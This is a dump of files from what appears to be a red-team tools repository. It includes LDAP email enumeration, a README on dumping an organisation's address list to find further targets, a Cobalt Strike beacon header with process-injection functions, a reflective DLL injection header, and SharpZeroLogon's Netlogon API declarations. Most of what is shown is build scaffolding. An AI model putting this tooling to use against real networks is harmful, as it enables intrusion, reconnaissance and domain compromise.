21 | ///
22 | public partial class Code : Page
23 | {
24 | public Code()
25 | {
26 | InitializeComponent();
27 |
28 | }
29 |
30 | private void CodeSave_Click(object sender, RoutedEventArgs e)
31 | {
32 | bool save = true;
33 | string newcode = RTB.Text;
34 | if(!newcode.Contains("[HEX]"))
35 | {
36 | MessageBox.Show("Code does not contain the [HEX] placeholder, please put this in.");
37 | save = false;
38 | }
39 |
40 | if(save)
41 | {
42 | File.WriteAllText("clrcode.cs", newcode);
43 | }
44 |
45 |
46 |
47 | }
48 |
49 | void Code_Loaded(object sender, RoutedEventArgs e)
50 | {
51 | string code = File.ReadAllText("clrcode.cs");
52 | // foreach (string line in code)
53 | RTB.CurrentHighlighter = AurelienRibon.Ui.SyntaxHighlightBox.HighlighterManager.Instance.Highlighters["CSharp"];
54 | RTB.Text = code;
55 |
56 |
57 | }
58 |
59 |
60 | }
61 | }
62 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/clsLDAP.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.DirectoryServices.AccountManagement;
4 | using System.Linq;
5 |
6 | namespace Sigwhatever
7 | {
8 | class ClsLDAP
9 | {
10 | public List EnumGroupEmails(string groupName, string domainName)
11 | {
12 | List emails = new List();
13 | try
14 | {
15 | using (PrincipalContext ctx = new PrincipalContext(ContextType.Domain, domainName))
16 | {
17 | using (GroupPrincipal grp = GroupPrincipal.FindByIdentity(ctx, IdentityType.Name, groupName))
18 | {
19 | var sams = from x in grp.GetMembers(true) select new { x.SamAccountName, };
20 | var users = from sam in sams.Distinct()
21 | let usr = UserPrincipal.FindByIdentity(ctx, IdentityType.SamAccountName, sam.SamAccountName)
22 | select new { usr.SamAccountName, usr.DisplayName, usr.EmailAddress };
23 |
24 | foreach (var u in users)
25 | {
26 | if (u.EmailAddress != null)
27 | {
28 | Console.WriteLine("Adding " + u.DisplayName + ": " + u.EmailAddress);
29 | emails.Add(u.EmailAddress);
30 | }
31 | }
32 | }
33 | }
34 | }
35 | catch (Exception e)
36 | {
37 | Console.WriteLine("Error getting emails: " + e.Message);
38 | }
39 | return emails;
40 | }
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger/SpoolTrigger.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
43 |
44 | Source Files
45 |
46 |
47 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger/patch.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | volatile char patchme[1024] = "PATCHME\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
--------------------------------------------------------------------------------
/Tools/oab-parse/README.md:
--------------------------------------------------------------------------------
1 | OAB-Parse
2 | =========
3 |
4 | Purpose
5 | -------
6 | A utility for dumping an organisation's Global Address List (GAL) from its Offline Address Book (OAB).
7 | The tool will parse Outlook's `udetails.oab` file found in `%localappdata%\Microsoft\Outlook\"Offline Address Books"\`
8 | or full .lzx files obtained from Microsoft Exchange, and produce a CSV or JSON file for further processing.
9 |
10 | The GAL includes phone numbers, job descriptions, distribution list sizes and additional user data.
11 | This can be of use on Red Team jobs after establishing an initial foothold to identify
12 | additional targets, for onwards attacks or as back-up should the initial access fail.
13 |
14 |
15 | Installation
16 | ------------
17 |
18 | * Install the latest version of Python 3 (tested with 3.9 on Windows)
19 | * Change into the root directory of a copy of this repository
20 | * Create a virtual environment to keep the dependencies separate from other apps: `\Python39\python -m venv .venv`
21 | * Activate the virtual environment: `.venv\Scripts\activate` or `source .venv/bin/activate` on *nix
22 | * Install the dependencies: `pip install -r requirements.txt`
23 | * On non-Windows systems, libmspack must also be installed for .lzx file support, e.g. on Kali: `sudo apt-get install libmspack0`
24 |
25 | Usage
26 | -----
27 | The tool is CLI based with built in help:
28 | ```
29 | (venv) C:\tools\oab-parse>python .\oab-parse.py --help
30 | Usage: oab-parse.py [OPTIONS] INFILE OUTFILE
31 |
32 | Parses Offline Address Books into text output.
33 |
34 | INFILE: Path to the udetails.oab or full .lzx file
35 | OUTFILE: The file to write to
36 |
37 | Options:
38 | --format [CSV|JSON] Output file format [default: CSV]
39 | --help Show this message and exit.
40 | ```
41 |
42 | And displays a progress bar whilst parsing the file
43 |
44 | ```
45 | (venv) C:\tools\oab-parse>python oab-parse.py --format=CSV C:\Jobs\ABCD\udetails.oab C:\Jobs\ABCD\gal.csv
46 | Parsing 9570 records...
47 | [########################------------] 68% 00:00:02
48 |
49 | ```
50 |
51 | The resulting CSV file can be imported into Excel for filtering & searching.
52 |
--------------------------------------------------------------------------------
/Tools/SharpZeroLogon/SharpZeroLogon/SharpZeroLogon.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {15CE9A3C-4609-4184-87B2-E29FC5E2B770}
8 | Exe
9 | SharpZeroLogon
10 | SharpZeroLogon
11 | v4.0
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 | true
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/Tools/Squeak/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Resources;
3 | using System.Runtime.CompilerServices;
4 | using System.Runtime.InteropServices;
5 | using System.Windows;
6 |
7 | // General Information about an assembly is controlled through the following
8 | // set of attributes. Change these attribute values to modify the information
9 | // associated with an assembly.
10 | [assembly: AssemblyTitle("Squeak")]
11 | [assembly: AssemblyDescription("")]
12 | [assembly: AssemblyConfiguration("")]
13 | [assembly: AssemblyCompany("")]
14 | [assembly: AssemblyProduct("Squeak")]
15 | [assembly: AssemblyCopyright("Copyright © 2021")]
16 | [assembly: AssemblyTrademark("")]
17 | [assembly: AssemblyCulture("")]
18 |
19 | // Setting ComVisible to false makes the types in this assembly not visible
20 | // to COM components. If you need to access a type in this assembly from
21 | // COM, set the ComVisible attribute to true on that type.
22 | [assembly: ComVisible(false)]
23 |
24 | //In order to begin building localizable applications, set
25 | //CultureYouAreCodingWith in your .csproj file
26 | //inside a . For example, if you are using US english
27 | //in your source files, set the to en-US. Then uncomment
28 | //the NeutralResourceLanguage attribute below. Update the "en-US" in
29 | //the line below to match the UICulture setting in the project file.
30 |
31 | //[assembly: NeutralResourcesLanguage("en-US", UltimateResourceFallbackLocation.Satellite)]
32 |
33 |
34 | [assembly: ThemeInfo(
35 | ResourceDictionaryLocation.None, //where theme specific resource dictionaries are located
36 | //(used if a resource is not found in the page,
37 | // or application resource dictionaries)
38 | ResourceDictionaryLocation.SourceAssembly //where the generic resource dictionary is located
39 | //(used if a resource is not found in the page,
40 | // app, or any theme specific resource dictionaries)
41 | )]
42 |
43 |
44 | // Version information for an assembly consists of the following four values:
45 | //
46 | // Major Version
47 | // Minor Version
48 | // Build Number
49 | // Revision
50 | //
51 | // You can specify all the values or you can default the Build and Revision Numbers
52 | // by using the '*' as shown below:
53 | // [assembly: AssemblyVersion("1.0.*")]
54 | [assembly: AssemblyVersion("1.0.0.0")]
55 | [assembly: AssemblyFileVersion("1.0.0.0")]
56 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/Tools/bof-vs-template/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/Tools/bof-vs-template/bof/beacon.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Beacon Object Files (BOF)
3 | * -------------------------
4 | * A Beacon Object File is a light-weight post exploitation tool that runs
5 | * with Beacon's inline-execute command.
6 | *
7 | * Cobalt Strike 4.1.
8 | */
9 |
10 | /* data API */
11 | typedef struct {
12 | char* original; /* the original buffer [so we can free it] */
13 | char* buffer; /* current pointer into our buffer */
14 | int length; /* remaining length of data */
15 | int size; /* total size of this buffer */
16 | } datap;
17 |
18 | DECLSPEC_IMPORT void BeaconDataParse(datap* parser, char* buffer, int size);
19 | DECLSPEC_IMPORT int BeaconDataInt(datap* parser);
20 | DECLSPEC_IMPORT short BeaconDataShort(datap* parser);
21 | DECLSPEC_IMPORT int BeaconDataLength(datap* parser);
22 | DECLSPEC_IMPORT char* BeaconDataExtract(datap* parser, int* size);
23 |
24 | /* format API */
25 | typedef struct {
26 | char* original; /* the original buffer [so we can free it] */
27 | char* buffer; /* current pointer into our buffer */
28 | int length; /* remaining length of data */
29 | int size; /* total size of this buffer */
30 | } formatp;
31 |
32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp* format, int maxsz);
33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp* format);
34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp* format);
35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp* format, char* text, int len);
36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp* format, char* fmt, ...);
37 | DECLSPEC_IMPORT char* BeaconFormatToString(formatp* format, int* size);
38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp* format, int value);
39 |
40 | /* Output Functions */
41 | #define CALLBACK_OUTPUT 0x0
42 | #define CALLBACK_OUTPUT_OEM 0x1e
43 | #define CALLBACK_ERROR 0x0d
44 | #define CALLBACK_OUTPUT_UTF8 0x20
45 |
46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char* fmt, ...);
47 | DECLSPEC_IMPORT void BeaconOutput(int type, char* data, int len);
48 |
49 | /* Token Functions */
50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token);
51 | DECLSPEC_IMPORT void BeaconRevertToken();
52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin();
53 |
54 | /* Spawn+Inject Functions */
55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char* buffer, int length);
56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char* payload, int p_len, int p_offset, char* arg, int a_len);
57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION* pInfo, char* payload, int p_len, int p_offset, char* arg, int a_len);
58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION* pInfo);
59 |
60 | /* Utility Functions */
61 | DECLSPEC_IMPORT BOOL toWideChar(char* src, wchar_t* dst, int max);
62 |
--------------------------------------------------------------------------------
/Tools/SharpZeroLogon/SharpZeroLogon/Netapi32.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SharpZeroLogon
5 | {
6 | internal class Netapi32
7 | {
8 | public enum NETLOGON_SECURE_CHANNEL_TYPE : int
9 | {
10 | NullSecureChannel = 0,
11 | MsvApSecureChannel = 1,
12 | WorkstationSecureChannel = 2,
13 | TrustedDnsDomainSecureChannel = 3,
14 | TrustedDomainSecureChannel = 4,
15 | UasServerSecureChannel = 5,
16 | ServerSecureChannel = 6
17 | }
18 |
19 | [StructLayout(LayoutKind.Explicit, Size = 516)]
20 | public struct NL_TRUST_PASSWORD
21 | {
22 | [FieldOffset(0)]
23 | public ushort Buffer;
24 |
25 | [FieldOffset(512)]
26 | public uint Length;
27 | }
28 |
29 | [StructLayout(LayoutKind.Explicit, Size = 12)]
30 | public struct NETLOGON_AUTHENTICATOR
31 | {
32 | [FieldOffset(0)]
33 | public NETLOGON_CREDENTIAL Credential;
34 |
35 | [FieldOffset(8)]
36 | public uint Timestamp;
37 | }
38 |
39 | [StructLayout(LayoutKind.Sequential)]
40 | public struct NETLOGON_CREDENTIAL
41 | {
42 | public sbyte data;
43 | }
44 |
45 | [DllImport("netapi32.dll", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode)]
46 | public static extern int I_NetServerReqChallenge(
47 | string PrimaryName,
48 | string ComputerName,
49 | ref NETLOGON_CREDENTIAL ClientChallenge,
50 | ref NETLOGON_CREDENTIAL ServerChallenge
51 | );
52 |
53 | [DllImport("netapi32.dll", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode)]
54 | public static extern int I_NetServerAuthenticate2(
55 | string PrimaryName,
56 | string AccountName,
57 | NETLOGON_SECURE_CHANNEL_TYPE AccountType,
58 | string ComputerName,
59 | ref NETLOGON_CREDENTIAL ClientCredential,
60 | ref NETLOGON_CREDENTIAL ServerCredential,
61 | ref ulong NegotiateFlags
62 | );
63 |
64 | [DllImport("netapi32.dll", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode)]
65 | public static extern int I_NetServerPasswordSet2(
66 | string PrimaryName,
67 | string AccountName,
68 | NETLOGON_SECURE_CHANNEL_TYPE AccountType,
69 | string ComputerName,
70 | ref NETLOGON_AUTHENTICATOR Authenticator,
71 | out NETLOGON_AUTHENTICATOR ReturnAuthenticator,
72 | ref NL_TRUST_PASSWORD ClearNewPassword
73 | );
74 | }
75 | }
76 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger/ReflectiveDllInjection.h:
--------------------------------------------------------------------------------
1 | //===============================================================================================//
2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3 | // All rights reserved.
4 | //
5 | // Redistribution and use in source and binary forms, with or without modification, are permitted
6 | // provided that the following conditions are met:
7 | //
8 | // * Redistributions of source code must retain the above copyright notice, this list of
9 | // conditions and the following disclaimer.
10 | //
11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of
12 | // conditions and the following disclaimer in the documentation and/or other materials provided
13 | // with the distribution.
14 | //
15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | //
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
30 | //===============================================================================================//
31 | #define WIN32_LEAN_AND_MEAN
32 | #include
33 |
34 | // we declare some common stuff in here...
35 |
36 | #define DLL_QUERY_HMODULE 6
37 |
38 | #define DEREF( name )*(UINT_PTR *)(name)
39 | #define DEREF_64( name )*(DWORD64 *)(name)
40 | #define DEREF_32( name )*(DWORD *)(name)
41 | #define DEREF_16( name )*(WORD *)(name)
42 | #define DEREF_8( name )*(BYTE *)(name)
43 |
44 | typedef ULONG_PTR(WINAPI* REFLECTIVELOADER)(VOID);
45 | typedef BOOL(WINAPI* DLLMAIN)(HINSTANCE, DWORD, LPVOID);
46 |
47 | #define DLLEXPORT __declspec( dllexport )
48 |
49 | //===============================================================================================//
50 | #endif
51 | //===============================================================================================//
52 |
--------------------------------------------------------------------------------
/Tools/Squeak/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace Squeak.Properties {
12 | using System;
13 |
14 |
15 | ///
16 | /// A strongly-typed resource class, for looking up localized strings, etc.
17 | ///
18 | // This class was auto-generated by the StronglyTypedResourceBuilder
19 | // class via a tool like ResGen or Visual Studio.
20 | // To add or remove a member, edit your .ResX file then rerun ResGen
21 | // with the /str option, or rebuild your VS project.
22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
25 | internal class Resources {
26 |
27 | private static global::System.Resources.ResourceManager resourceMan;
28 |
29 | private static global::System.Globalization.CultureInfo resourceCulture;
30 |
31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
32 | internal Resources() {
33 | }
34 |
35 | ///
36 | /// Returns the cached ResourceManager instance used by this class.
37 | ///
38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
39 | internal static global::System.Resources.ResourceManager ResourceManager {
40 | get {
41 | if (object.ReferenceEquals(resourceMan, null)) {
42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Squeak.Properties.Resources", typeof(Resources).Assembly);
43 | resourceMan = temp;
44 | }
45 | return resourceMan;
46 | }
47 | }
48 |
49 | ///
50 | /// Overrides the current thread's CurrentUICulture property for all
51 | /// resource lookups using this strongly typed resource class.
52 | ///
53 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
54 | internal static global::System.Globalization.CultureInfo Culture {
55 | get {
56 | return resourceCulture;
57 | }
58 | set {
59 | resourceCulture = value;
60 | }
61 | }
62 | }
63 | }
64 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/HTTPCap.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.Text;
4 | using System.Collections;
5 | using System.Collections.Generic;
6 | using System.Text.RegularExpressions;
7 |
8 | namespace Sigwhatever
9 | {
10 | class HTTPCap
11 | {
12 | public static Hashtable smbSessionTable = Hashtable.Synchronized(new Hashtable());
13 | public static Hashtable httpSessionTable = Hashtable.Synchronized(new Hashtable());
14 | public static IList outputList = new List();
15 | public static bool consoleOutput = true;
16 | public static bool enabledInspect = false;
17 | public static bool enabledProxy = false;
18 | public static string argFileOutputDirectory = Directory.GetCurrentDirectory();
19 | public static string argFilePrefix = "Log";
20 | public static string key = RandomString(10, false);
21 |
22 | public static string RandomString(int size, bool lowerCase)
23 | {
24 | StringBuilder builder = new StringBuilder();
25 | Random random = new Random();
26 | char ch;
27 | for (int i = 0; i < size; i++)
28 | {
29 | ch = Convert.ToChar(Convert.ToInt32(Math.Floor(26 * random.NextDouble() + 65)));
30 | builder.Append(ch);
31 | }
32 | if (lowerCase)
33 | return builder.ToString().ToLower();
34 | return builder.ToString();
